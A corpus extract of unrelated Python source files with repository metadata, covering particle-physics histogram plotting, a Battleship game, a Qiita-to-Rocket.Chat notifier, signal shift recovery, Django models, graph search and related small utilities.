#h_dimuon_m_real_fake_1.DrawNormalized("same")
#
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake.png")
#
#h_dimuon_m_real_fake_log_dummy.Draw()
#cnv.SetLogy()
#h_dimuon_m_real_fake_log_0.DrawNormalized("same")
#h_dimuon_m_real_fake_log_1.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_dimuon_m_real_fake_log_0,"Real dimuons","L")
#legend.AddEntry(h_dimuon_m_real_fake_log_1,"Fake dimuons","L")
#legend.Draw()
#info.Draw()
#txtHeader.Draw()
#
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_real_fake_log.png")
cnv.SetLogy(0)
h_m1_vs_m2.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m1_vs_m2.C")
cnv.SetLogx()
h_m2.Draw()
h_m1.Draw("same")
info.Draw()
txtHeader.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m.C")
cnv.SetLogx(0)
h_dimuon_m_fake_dummy.Draw()
h_dimuon_m_fake_0.DrawNormalized("same")
scaleAxisY(h_dimuon_m_fake_0,h_dimuon_m_fake_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake.C")
h_dimuon_m_fake_log_dummy.Draw()
cnv.SetLogy()
cnv.SetLogx()
h_dimuon_m_fake_log_0.DrawNormalized("same")
#scaleAxisY(h_dimuon_m_fake_log_0,h_dimuon_m_fake_log_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_m_fake_log.C")
cnv.SetLogy(0)
cnv.SetLogx(0)
h_dimuon_1_pT_dummy.Draw()
h_dimuon_1_pT.DrawNormalized("same")
h_dimuon_2_pT.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pT,h_dimuon_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pT,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pT,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pT.C")
h_dimuon_1_pZ_dummy.Draw()
#plotOverflow(h_dimuon_1_pZ)
#plotOverflow(h_dimuon_2_pZ)
h_dimuon_1_pZ.DrawNormalized("same")
h_dimuon_2_pZ.DrawNormalized("same")
scaleAxisY(h_dimuon_2_pZ,h_dimuon_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_pZ,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_pZ,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_pZ.C")
h_dimuon_1_Eta_dummy.Draw()
h_dimuon_1_Eta.DrawNormalized("same")
h_dimuon_2_Eta.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Eta,h_dimuon_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Eta,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Eta,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Eta.C")
h_dimuon_1_Phi_dummy.Draw()
h_dimuon_1_Phi.DrawNormalized("same")
h_dimuon_2_Phi.DrawNormalized("same")
scaleAxisY(h_dimuon_1_Phi,h_dimuon_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_Phi,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_Phi,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_Phi.C")
h_dimuon_1_p_dummy.Draw()
plotOverflow(h_dimuon_1_p)
plotOverflow(h_dimuon_2_p)
scaleAxisY(h_dimuon_2_p,h_dimuon_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_dimuon_1_p,"1st #mu#mu (leading p_{T})","L")
legend.AddEntry(h_dimuon_2_p,"2nd #mu#mu","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_dimuon_p.C")
BAM.Write()
print "Made it to the end and closes"
f.close()
| [
"[email protected]"
]
| |
2690dfe618649e308a0dc47ef332ab5e56e29930 | 84c38b838ca74cf80fe276d272537b1b840bfe6d | /Battleship.py | 6ff503cc58f958d7415b052af718a3ad315768e3 | []
| no_license | Chruffman/Personal-Projects | 9c385a145e02661cf0dddc76d6f2b5034a6a35f9 | d271573b4e48c3026d0cc09d4483c218bc3dfa97 | refs/heads/master | 2021-01-21T05:17:07.536173 | 2018-07-24T13:37:50 | 2018-07-24T13:37:50 | 83,166,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | # my attempt at the Battleship! assignment from codeacademy.com
from random import randint
board = []
for quadrant in range(6):
board.append(['O'] * 6)
def display_board(board):
for row in board:
print (" ".join(row))
print ("Let's play Battleship!")
display_board(board)
def new_row(board):
return randint(0, len(board) - 1)
def new_col(board):
return randint(0, len(board) - 1)
game_row = new_row(board)
game_col = new_col(board)
print (game_col)
print (game_row)
guess = 0
for guess in range(5):
guess += 1
user_row = int(input("Guess row: "))
user_col = int(input("Guess column: "))
if user_row == game_row and user_col == game_col:
print ("You sunk my battleship! Curses!!")
print ("You win!")
break
else:
if user_row not in range(6) or user_col not in range(6):
print ("Your guess is not even in the ocean. Maybe improve your aim?")
elif board[user_row][user_col] == 'X':
print ("You have already unsuccessfully guessed that sector of the game board.")
else:
if guess == 5:
print ("Game Over.")
else:
print ("You missed my battleship!")
board[user_row][user_col] = 'X'
print ("Guess", guess + 1)
display_board(board) | [
"[email protected]"
]
| |
4ec6a82a97d5f6196307fc39b56522e1fa8b4f01 | a1e01939dfb63139271b137620f57a55420f8dbe | /utils/path_helper.py | 85715b225a360b44fe77bf61e8fa0ca6a7f65723 | [
"BSD-3-Clause"
]
| permissive | KindRoach/NARRE-Pytorch | 839becc7128a5875e6dbcab62eafea914b3b7c4f | 14fec7e623e36350e43d24e2629297ab0d308170 | refs/heads/master | 2023-06-01T02:56:03.323533 | 2023-05-22T13:32:23 | 2023-05-22T13:32:23 | 270,171,507 | 8 | 3 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | from pathlib import Path
ROOT_DIR = Path(__file__).parent.parent
if __name__ == "__main__":
print(ROOT_DIR)
| [
"[email protected]"
]
| |
6b6eff5bda3cf3377e02463065468ac0476d1bf8 | 38ecc2e4d128f2770c105673fba2c480a96d688f | /Задание №1 по наследованию.py | a44643ebcea89a7b2241ab2fc0a27647c14c4a1a | []
| no_license | Valentin31121967/Class- | 288c4b2cf430bcb1b6c3dd756d0040867125b2f9 | 078ab77356e9d6b7532622a2d32c5ea29fb7ffcb | refs/heads/master | 2022-04-15T05:09:11.094751 | 2020-04-15T04:45:29 | 2020-04-15T04:45:29 | 255,808,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,352 | py | # Задание №1. Взять задание из предыдущей лекции и отделить функции сохранения и загрузки в отдельный класс
import json
# Создаем новый класс User
class User:
# Функция конструктор класса User
def _init_(self):
self.first_name = None
self.middle_name = None
self.last_name = None
self.age = None
# Функция ввода данных пользователя
def input_info(self):
self.first_name = input("Input First Name: ")
self.middle_name = input("Input Middle Name: ")
self.last_name = input("Input Last Name: ")
self.age = input("Input Age: ")
# Функция сериализации данных в удобный вид для чтения на экране
def serialize(self):
return "First name: {}\n" \
"Middle name: {}\n"\
"Last name: {}\n" \
"Age : {}\n"\
.format(self.first_name, self.middle_name, self.last_name, self.age)
# Создаем дочерний класс Save_load_data (User)
class Save_load_data(User):
# Функция записи данных в отдельный файл
def fail_save(self):
fil = str(input("Введите с клавиатуры имя файла для записи на диск: "))
with open(fil, "w") as f:
data = {"first_name": self.first_name,
"middle_name": self.middle_name,
"last_name": self.last_name,
"age": self.age}
json.dump(data, f)
# Функция загрузки данных из отдельного файла
def fail_load(self):
fil = str(input("Введите с клавиатуры имя файла для загрузки с диска: "))
with open(fil, "r") as f:
data = json.loads(f.read())
self.first_name = data["first_name"]
self.last_name = data["last_name"]
self.middle_name = data["middle_name"]
self.age = data["age"]
print(data)
user = Save_load_data()
user.input_info()
print(user.serialize())
print(user.fail_save())
print(user.fail_load())
print(user)
| [
"[email protected]"
]
| |
b04ee7d509224ea32bcdc2abd3aa726509802b36 | 253296050582fbe0a8605353295ab27daae4deff | /main.py | 32884c43658bae739d1868be5e5ce5b322bef693 | []
| no_license | qiita-scraper/qiita-scraper-rocket-chat | a44d95d125431670dda97b5614f92d0ee0d09098 | 86c1b6e0d4d889deb9a468cd85a1d0f93eb9cc20 | refs/heads/master | 2023-05-14T23:39:42.637110 | 2019-12-17T15:50:51 | 2019-12-17T15:50:51 | 228,154,303 | 4 | 0 | null | 2023-05-07T13:10:45 | 2019-12-15T08:43:31 | Python | UTF-8 | Python | false | false | 1,461 | py | import os
from rocket_chat import rocket_chat
from qiita import qiita
import yaml
def main():
url, user, password = __get_os_environ()
room_name, organization = __get_config()
q = qiita.Qiita()
rc = rocket_chat.RocketChat(url, user, password)
for user in q.fetch_organization_users(organization):
articles = q.fetch_recent_user_articles(user)
for yesterday_article in q.extract_yesterday_articles(articles):
msg = rc.format_message(user=user, title=yesterday_article['title'], article_url=yesterday_article['url'])
rc.send_message_to_rocket_chat(msg, room_name)
def __get_config():
f = open("config.yml", "r")
data = yaml.load(f)
room_name = data.get('rocket_chat').get('room_name')
organization = data.get('qiita').get('organization')
return room_name, organization
def __get_os_environ():
url = os.environ.get('ROCKET_CHAT_URL')
user = os.environ.get('ROCKET_CHAT_USER')
password = os.environ.get('ROCKET_CHAT_PASSWORD')
if url is None or len(url) == 0:
raise Exception('ROCKET_CHAT_URL is not set in environment variable')
if user is None or len(user) == 0:
raise Exception('ROCKET_CHAT_USER is not set in environment variable')
if password is None or len(password) == 0:
raise Exception('ROCKET_CHAT_PASSWORD is not set in environment variable')
return url, user, password
def handler(event, context):
main()
| [
"[email protected]"
]
| |
79db44dd6ae283d024b6f0487e48e369d2b2d272 | 83eadd220a58329ad7fdb6a223dcc02cb9e6dd81 | /load_discussions.py | 67d431ff934d2ae0fe8c1580dd8f0a00309eba1c | []
| no_license | LironRS/anyway | 7d49a1d994d3685d62acf6e3435a38c9f58b0c35 | 813283a0c4fe966f1752d0e2e85aa30c6fad7693 | refs/heads/master | 2021-01-15T09:09:12.309208 | 2015-05-19T12:21:22 | 2015-05-19T12:21:22 | 35,944,465 | 0 | 0 | null | 2015-05-20T11:42:39 | 2015-05-20T11:42:39 | null | UTF-8 | Python | false | false | 977 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from models import DiscussionMarker
import re
from datetime import datetime
from database import db_session
def main():
parser = argparse.ArgumentParser()
parser.add_argument('identifiers', type=str, nargs='+',
help='Disqus identifiers to create markers for')
args = parser.parse_args()
for identifier in args.identifiers:
m = re.match('\((\d+\.\d+),\s*(\d+\.\d+)\)', identifier)
if not m:
print("Failed processing: " + identifier)
continue
(latitude, longitude) = m.group(1, 2)
marker = DiscussionMarker.parse({
'latitude': latitude,
'longitude': longitude,
'title': identifier,
'identifier': identifier
})
db_session.add(marker)
db_session.commit()
print("Added: " + identifier)
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
a2f7ae216b410776277bf51f39352e0afd7a8354 | cb892c75961eeae4e9c968403e823565d2b0056e | /periodic1D.py | ce67dcd6b4588f63f65e9a66e3aeef14fbdecd90 | []
| no_license | victorstorchan/signal-processing | 7deb60ed1e3f7ae09553cbe0faf6fce3fec97fc8 | a51e9855cb8cb7a63ecbab9fac645fc4846b03a7 | refs/heads/master | 2021-01-19T03:02:07.791676 | 2016-07-16T12:32:27 | 2016-07-16T12:32:27 | 52,238,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | import numpy as np
import matplotlib.pyplot as plt
from cmath import polar
from math import sqrt
#definition of the boxcars signals
def boxcar(x,i):
if x-i<-1 or x-i>1:
return 0
else:
return 1
x= np.arange(-2.,2.,0.05)
n=len(x)
print(n)
True_signal=np.zeros(n)
for i in range(n):
True_signal[i]=boxcar(x[i],0)
#plt.plot(x,True_signal)
#plt.axis([-2,2,-1,2])
#plt.show()
#definitions of the shifted signals
y=np.zeros(n,dtype=complex)
y2=np.zeros(n,dtype=complex)
base=np.zeros(n,dtype=complex)
vector_of_shift=[0,3,10,30]#shifts are integer in discrete version
len_shift=len(vector_of_shift)
#signal with shift:
shifted_signals=np.zeros((len_shift,n),dtype=complex)
shifted_signals_1=np.zeros((len_shift,n),dtype=complex)
for k in range(n):
base[k]=boxcar(x[k],0)
max_shift=max(vector_of_shift)
base_period=np.lib.pad(base, (max_shift, 0), 'wrap')
for s in range(len_shift):
for k in range(n):
if k-vector_of_shift[s]<0:
y[k]=base_period[max_shift-vector_of_shift[s]-1+k]
y2[k]=base_period[max_shift-vector_of_shift[s]-1+k]*np.exp(2J*np.pi*k/n)
else:
y[k]=boxcar(x[k-vector_of_shift[s]],0)
y2[k]=boxcar(x[k-vector_of_shift[s]],0)*np.exp(2J*np.pi*k/n)
randvect=np.random.normal(0,0.1,n)
shifted_signals[s] =y#+ randvect
shifted_signals_1[s]=y2#+ randvect
A=np.fft.fft(shifted_signals)
A_1=np.fft.fft(shifted_signals_1).conjugate()
A_star=np.zeros((len_shift,n),dtype=complex)
for i in range(len_shift):
A_star[i] = A[i]*A_1[i]
A_star_matrix=np.matrix(A_star)
A_star_transpose=A_star_matrix.getH()
A_prod1=A_star_matrix*A_star_transpose
A_prod=A_prod1/A_prod1[0,0]
(V,sigma,V_star)=np.linalg.svd(A_prod,full_matrices=1)
v1=V_star[0].getH()
#the shifts are recovered:
output=np.zeros(len_shift,dtype=complex)
for i in range(len_shift):
output[i]=-n*polar(-v1[i,0])[1]/(2*np.pi)
output
| [
"[email protected]"
]
| |
f1fb0b7965ea4496faa19f2a337c9563b82ab413 | d12fe2658edc0db98b278aab507fc86efefd5541 | /chat/forms.py | 0d23f6da0892f36ce4d4af4442b0a0e72db168f1 | []
| no_license | harumi-matsumoto/django-ai-chatbot | 6190c1090e8aea877ff7573c45421e10158e4a64 | 90e2b8e8cec98c022892e8603eb090fc64197b3f | refs/heads/master | 2020-08-05T16:10:09.162039 | 2019-10-12T03:10:54 | 2019-10-12T03:10:54 | 212,608,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | from django import forms
class TestPredictForm(forms.Form):
message = forms.CharField(widget=forms.Textarea, max_length=255) | [
"[email protected]"
]
| |
b64dcfd8310e0a91a5674a0426a212d4e4014f18 | b12875980121be80628e3204a5a62fbbd6190222 | /seesion7/minihack5.py | 7dba52421d756d3b660a75259e7d867a584fab55 | []
| no_license | hoangstillalive/hoangstillalive | ef2eb9a173b346e75ac0a35c455cebacd1a9fe91 | 304e0087792857815090cb890e18086d1128df6f | refs/heads/master | 2020-06-12T10:07:33.319139 | 2019-09-13T12:31:57 | 2019-09-13T12:31:57 | 194,267,120 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | side = int(input("Enter side of shape you like:"))
angle = 360/side
from turtle import*
shape("turtle")
for i in range(side):
forward(100)
left (angle)
mainloop()
| [
"[email protected]"
]
| |
c0b608d437f149d8760c931ec9488e38f0fefb57 | b7634e92ed147a34cdb017598c6d8dd41c0def96 | /aula05/migrations/0002_categoria_comentario_post.py | 3a636face480cf6e0fdc9a2f6b875eb3ce1d9fd2 | []
| no_license | mayronceccon/olist-django-labs | a4e9805489f4c9ad782f5085188dee342d4ac051 | fbe6f314554e65f0a47dddc7c2c21165ccc1d828 | refs/heads/master | 2021-09-28T14:21:44.385979 | 2020-06-06T00:25:54 | 2020-06-06T00:25:54 | 240,728,135 | 1 | 0 | null | 2021-09-22T18:44:59 | 2020-02-15T14:36:27 | Python | UTF-8 | Python | false | false | 1,411 | py | # Generated by Django 3.0.3 on 2020-02-29 17:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('aula05', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nome', models.CharField(max_length=30)),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('titulo', models.CharField(max_length=254)),
('texto', models.TextField()),
('categorias', models.ManyToManyField(related_name='posts', to='aula05.Categoria')),
],
),
migrations.CreateModel(
name='Comentario',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('autor', models.CharField(max_length=30)),
('comentario', models.TextField()),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='aula05.Post')),
],
),
]
| [
"[email protected]"
]
| |
65e50e3080ce522797d0807c4a9ccf3ad3d59230 | 9cb4b1707c9cf2cb2d45849a32625ddcd5d2ce15 | /data_structures/graph/graph.py | 76c5509f826c0cf30c80e238bb6245540194a1f8 | []
| no_license | paxzeno/CrackingTheCodingInterview | 14b0a0bd8a8f9a0bf30defbd07c4e6d1c1b0a549 | d082c704d8a2d4a4e61371091abb023a1dc5fa99 | refs/heads/master | 2020-04-26T17:24:55.098714 | 2019-03-16T17:35:03 | 2019-03-16T17:35:03 | 173,712,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,397 | py | import random
import Queue
from node import Node
class RoadMap:
def __init__(self, queue):
self._queue = queue
self._path = {}
self._new_paths = set()
def get_queue(self):
return self._queue
def set_path(self, node_name, parent_node_name):
# think if there may be some bogus behavior,
# because of several parents could share the same child node
self._path[node_name] = parent_node_name
def get_path(self):
return self._path
def set_new_paths(self, paths):
self._new_paths = paths
def get_new_paths(self):
return self._new_paths
class Graph:
def __init__(self):
self._nodes = []
def add_node(self, node):
self._nodes.append(node)
def get_nodes(self):
return self._nodes
def generate_graph(self, number_nodes, max_number_children=4):
self._nodes = [None] * number_nodes
for i in xrange(0, number_nodes):
self._nodes[i] = Node(i)
for node in self._nodes:
# number of children this node will have from 1 to 4 Max
number_children = random.randint(1, max_number_children)
for j in xrange(0, number_children):
child_node_name = -1
while child_node_name == -1 or child_node_name == node.get_name():
child_node_name = random.randint(0, number_nodes - 1)
node.add_child(self._nodes[child_node_name])
def depth_first_search(self, node_name):
# to be implemented
return None
def breath_first_search(self, root_name, end_name):
node = self._nodes[root_name]
queue = Queue.Queue()
queue.put(node)
# TODO no need to have checked and path,
# TODO path can handle both functions
checked = set()
checked.add(node)
path = {}
while not queue.empty():
q_node = queue.get()
self.print_node(q_node)
for child_node in q_node.get_children():
if child_node.get_name() not in checked:
path[child_node.get_name()] = q_node.get_name()
checked.add(child_node.get_name())
if child_node.get_name() == end_name:
return self.print_path(path, root_name, end_name)
else:
queue.put(child_node)
return self.print_path(None)
def bidirectional_bfs_search(self, root_name, end_name):
root_node = self._nodes[root_name]
end_node = self._nodes[end_name]
root_queue = Queue.Queue()
root_queue.put(root_node)
root_road_map = RoadMap(root_queue)
found = False
while not root_road_map.get_queue().empty() and not found:
root_road_map = self.iterated_bfs_search(root_road_map)
if end_node in root_road_map.get_new_paths():
found = True
if found:
return self.print_path(root_road_map.get_path(), root_name, end_name)
return self.print_path(None)
def iterated_bfs_search(self, road_map):
queue = road_map.get_queue()
node = queue.get()
self.print_node(node)
children = node.get_children()
road_map.set_new_paths(children)
path = road_map.get_path()
for child_node in children:
if child_node.get_name() not in path:
road_map.set_path(child_node.get_name(), node.get_name())
queue.put(child_node)
return road_map
@staticmethod
def print_path(path, origin=None, end=None):
if path is None:
return 'No path found for the node'
route = str(end)
pointer = end
while pointer != origin:
route += ' -> ' + str(path[pointer])
pointer = path[pointer]
return route
@staticmethod
def print_node(node):
print_children = ', Child Nodes: ['
for child_node in node.get_children():
print_children += str(child_node.get_name()) + ';'
print_children += ']'
print('Node:' + str(node.get_name()) + print_children)
if __name__ == '__main__':
graph = Graph()
graph.generate_graph(20, 2)
print(graph.breath_first_search(0, 2))
print(graph.bidirectional_bfs_search(0, 2))
| [
"[email protected]"
]
| |
712c8911fb30a81f68341c8d02607fc01373169c | bc2effb57e82128b81371fb03547689255d5ef15 | /백준/그래프/13549(숨바꼭질 3).py | 3e27f94ac43b4efa403bf096775a59d3e8e538cd | []
| no_license | CharmingCheol/python-algorithm | 393fa3a8921f76d25e0d3f02402eae529cc283ad | 61c8cddb72ab3b1fba84171e03f3a36f8c672648 | refs/heads/master | 2023-03-01T11:00:52.801945 | 2021-01-31T13:38:29 | 2021-01-31T13:38:29 | 229,561,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | import sys
from collections import deque
MAX_SIZE = 100001
start, end = map(int, sys.stdin.readline().split())
board = [float("inf")] * MAX_SIZE
board[start] = 0
queue = deque()
queue.append((start, 0))
while queue:
now, value = queue.popleft()
if now == end:
print(board[now])
break
if value != board[now]: continue
if 0 <= now - 1 and value + 1 < board[now - 1]:
board[now - 1] = value + 1
queue.append((now - 1, value + 1))
if now + 1 < MAX_SIZE and value + 1 < board[now + 1]:
board[now + 1] = value + 1
queue.append((now + 1, value + 1))
if now * 2 < MAX_SIZE and value < board[now * 2]:
board[now * 2] = value
queue.append((now * 2, value))
| [
"[email protected]"
]
| |
37886a99293824da426248ef167d6469762d4331 | 48d17885eda6401cde7e4ef563727ad4b5a7e851 | /ex43_classes.py | 18549bd62a8d355389e39399f65761f4a307dcb6 | []
| no_license | bowen0701/learn-python-the-hard-way | 635680d711dca044e2584ffe7dc3b129998f59db | 73540c462cf1561271664d2058e902d60907c200 | refs/heads/master | 2021-09-22T11:01:35.059384 | 2018-09-08T23:30:38 | 2018-09-08T23:30:38 | 94,005,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | """Basic Object-Oriented Anaysis and Design."""
class Scene(object):
def enter(self):
pass
class Engine(object):
def __init__(self, scene_map):
pass
def play(self):
pass
class Death(Scene):
def enter(self):
pass
class CentralCorridor(Scene):
def enter(self):
pass
class LaserWeaponArmory(Scene):
def enter(self):
pass
class TheBridge(Scene):
def enter(self):
pass
class EscapePod(Scene):
def enter(self):
pass
class Map(object):
def __init__(self, start_scene):
pass
def next_scene(self, scene_name):
pass
def opening_scene(self):
pass
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
| [
"[email protected]"
]
| |
7e33879f634aa7e8d75988cebf28a1a0a95922cf | 9918208c80a3c396d8a1e13783d501d60dbc2050 | /digitalearthau/index.py | 184f71b63443c944423a74ab43f21a32af6c40c5 | []
| no_license | benjimin/digitalearthau | 2d3010be76fad0d0b6b4854dbbad07e98254b239 | 5098bf3c88627cad78a8caa5ab703c586c17a6f7 | refs/heads/develop | 2022-02-27T07:36:16.009689 | 2017-09-14T05:51:27 | 2017-09-14T05:51:27 | 103,460,937 | 0 | 0 | null | 2017-09-13T23:10:15 | 2017-09-13T23:10:15 | null | UTF-8 | Python | false | false | 7,353 | py | import collections
import uuid
from datetime import datetime
from typing import Iterable, Optional, Mapping, List
from datacube.index import index_connect
from datacube.index._api import Index
from datacube.model import Dataset
from datacube.scripts import dataset as dataset_script
from datacube.utils import uri_to_local_path
from digitalearthau.utils import simple_object_repr
class DatasetLite:
"""
A small subset of datacube.model.Dataset.
A "real" dataset needs a lot of initialisation: types etc, so this is easier to test with.
We also, in this script, depend heavily on the __eq__ behaviour of this particular class (by id only), and subtle
bugs could occur if the core framework made changes to it.
"""
def __init__(self, id_: uuid.UUID, archived_time: datetime = None) -> None:
# Sanity check of the type, as our equality checks are quietly wrong if the types don't match,
# and we've previously had problems with libraries accidentally switching string/uuid types...
assert isinstance(id_, uuid.UUID)
self.id = id_
self.archived_time = archived_time
@property
def is_archived(self):
